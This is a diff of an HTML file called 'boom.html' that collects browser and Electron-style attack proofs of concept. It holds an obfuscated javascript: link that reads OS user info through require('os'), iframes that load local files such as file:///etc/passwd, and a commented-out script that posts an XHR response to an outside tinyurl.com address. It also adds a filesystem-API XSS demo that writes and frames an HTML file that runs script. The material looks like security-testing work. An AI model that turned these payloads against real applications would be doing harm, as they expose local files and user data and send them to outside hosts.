--- a/boom.html
+++ b/boom.html
@@ -1,19 +1,10 @@
-<a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>
-
-
-<iframe 
-  src="file:///Users/" 
-  width="100%" 
-  height="600px" 
-  style="border:1px solid black;">
-</iframe>
-
-<iframe 
+<a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>123
+<!-- <iframe 
   src="file:///etc/passwd" 
   width="100%" 
   height="600px" 
   style="border:1px solid black;">
-</iframe>
+</iframe> -->
 
 <!-- <!DOCTYPE html>
 <body>
@@ -50,5 +41,43 @@
     xhr.onload = () => fetch('https://tinyurl.com/vvh5tkem/xhr', { body: xhr.responseText });
     xhr.send();
   </script> -->
+<!-- </body>
+</html> -->
+
+1234
+<!DOCTYPE html>
+<html>
+<head>
+  <title>Filesystem XSS PoC</title>
+</head>
+<body>
+  <h2>Filesystem XSS Test</h2>
+
+  <script>
+    webkitRequestFileSystem(TEMPORARY, 1024 * 1024, function(fs) {
+      fs.root.getFile('exploit.html', { create: true }, function(entry) {
+        entry.createWriter(function(writer) {
+          const html = `<html>
+  <body style="background:black;color:lime;font-size:32px;">
+    <h1>XSS Executed</h1>
+    <script>alert('PWNED')</` + `script>
+  </body>
+</html>`;
+          writer.write(new Blob([html], { type: 'text/html' }));
+
+          writer.onwriteend = function() {
+            const iframe = document.createElement('iframe');
+            iframe.src = entry.toURL();
+            iframe.width = "100%";
+            iframe.height = "300";
+            iframe.style.border = "3px solid lime";
+            document.body.appendChild(iframe);
+          };
+        });
+      });
+    }, function(err) {
+      console.error('Filesystem request failed:', err);
+    });
+  </script>
 </body>
 </html>
